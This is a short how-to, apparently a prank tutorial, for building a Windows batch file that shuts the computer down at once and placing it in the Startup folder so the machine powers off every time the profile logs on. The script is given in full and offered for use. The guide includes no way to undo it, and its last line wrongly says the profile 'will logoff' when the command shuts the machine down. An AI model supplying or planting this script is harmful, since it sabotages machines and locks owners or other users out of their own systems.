Introduction: Shutdown Computer Forever

Make a batch file with shutdown commands and paste to startup!

Step 1: Make the Batch File

Go to notepad and type the following between the lines:
_____________________________________________

@echo off
cd /
shutdown -s -t 00 -c "Permanent Shutdown"
exit

_____________________________________________

Step 2: Save As .bat

Go to file > save as > Permanent Shutdown.bat > save

Step 3: Send to Desktop

Find that file we just made in all files right click it > send to > desktop (create shortcut).

Step 4: Paste to Startup

Go to Start > All Programs > Startup > right click startup folder > Open > drag and drop the Permanent Shutdown file from the desktop to the empty box. Now every time that profile logs on, it will logoff.